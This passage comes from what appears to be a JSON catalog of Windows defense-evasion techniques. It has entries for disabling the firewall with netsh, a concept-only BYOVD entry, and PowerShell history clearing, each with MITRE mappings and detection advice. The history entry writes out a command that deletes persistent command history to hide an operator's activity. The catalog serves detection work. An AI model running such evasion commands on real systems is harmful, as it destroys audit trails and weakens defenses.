Learn netsh-advfirewall doc confirms 'netsh advfirewall set [allprofiles|...] state <on|off|notconfigured>' where off 'Disables the firewall'; Windows Firewall Event ID 2003 (profile setting changed) confirmed; ATT&CK T1562.004. No change." 1211 }, 1212 { 1213 "toolName": "BYOVD (vulnerable driver)", 1214 "toolId": "byovd", 1215 "platform": [ 1216 "Windows" 1217 ], 1218 "capability": [ 1219 "Defense Evasion", 1220 "Privilege Escalation" 1221 ], 1222 "nativeCategory": [ 1223 "Impair Defenses", 1224 "Bring Your Own Vulnerable Driver" 1225 ], 1226 "command": "# BYOVD is documented here as a NAMED concept only. No exploitation steps are provided. Reference the LOLDrivers catalog for known-vulnerable signed drivers and the vendor blocklist for defensive coverage.", 1227 "description": "Bring Your Own Vulnerable Driver (BYOVD) is a named, publicly-documented class of technique in which an adversary who already holds local administrator rights loads a legitimately signed but known-vulnerable kernel driver, then abuses that driver's flaw to gain kernel-mode code execution and disable or blind EDR/AV. This entry catalogs the concept and detection surface only; it contains no driver-exploitation procedure.", 1228 "usecase": "Understand and detect kernel-level tampering where a signed vulnerable driver is used to kill or blind security tooling.", 1229 "mitre": [ 1230 "T1068", 1231 "T1562.001" 1232 ], 1233 "privilege": "admin", 1234 "detection": "Monitor Sysmon Event ID 6 (driver loaded) and Security 4697/System 7045 (new kernel-mode service) for drivers matching LOLDrivers hashes/signatures or loading from user-writable paths. Enforce the Microsoft Vulnerable Driver Blocklist and WDAC/HVCI to block known-bad drivers. Alert on unexpected drivers signed by unrelated third parties on servers/workstations.", 1235 "references": [ 1236 "https://attack.mitre.org/techniques/T1068/", 1237 "https://www.loldrivers.io/" 1238 ], 1239 "verifyNote": "Concept-only (no exploit steps); LOLDrivers.io is the canonical public catalog of known-vulnerable signed drivers and ATT&CK T1068 (Exploitation for Priv-Esc) + T1562.001 map to BYOVD; Sysmon 6 / Security 4697 / System 7045 detection is accurate. No change." 1240 }, 1241 { 1242 "toolName": "Clear-History", 1243 "toolId": "powershell", 1244 "platform": [ 1245 "Windows" 1246 ], 1247 "capability": [ 1248 "Defense Evasion" 1249 ], 1250 "nativeCategory": [ 1251 "Indicator Removal", 1252 "Clear Command History" 1253 ], 1254 "command": "Clear-History; Remove-Item (Get-PSReadlineOption).HistorySavePath", 1255 "description": "Clear-History flushes the current PowerShell session's in-memory history, while deleting the PSReadLine save path (ConsoleHost_history.txt) removes the persistent, cross-session command history; Set-PSReadLineOption -HistorySaveStyle SaveNothing disables future history writes. Together these hide the commands an operator ran.", 1256 "usecase": "Erase both session and persistent PowerShell command history to conceal executed commands.", 1257 "mitre": [ 1258 "T1070.003" 1259 ], 1260 "privilege": "user", 1261 "detection": "Capture Script Block Logging (4104) for 'Clear-History', 'Remove-Item ...HistorySavePath', '(Get-PSReadlineOption).HistorySavePath', and 'Set-PSReadLineOption -HistorySaveStyle SaveNothing'. Alert when ConsoleHost_history.txt is deleted, emptied, or truncated (file-audit / Sysmon 23 file-delete). Prefer transcript logging and central forwarding, which survive local history deletion.", 1262 "references": [ 1263 "https://attack.mitre.org/techniques/T1070/003/", 1264 "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md" 1265 ], 1266 "verifyNote": "MS Learn confirms Set-PSReadLineOption -HistorySaveStyle SaveNothing ('Don't use a history file') and HistorySavePath ($($Host.Name)_history.txt, e.g. ConsoleHost_history.txt); Clear-History is a built-in cmdlet; Atomic Red Team T1070.003 documents the technique (also corroborated by Black Hills InfoSec write-up); ATT&CK T1070.003. No change." 1267 } 1268 ]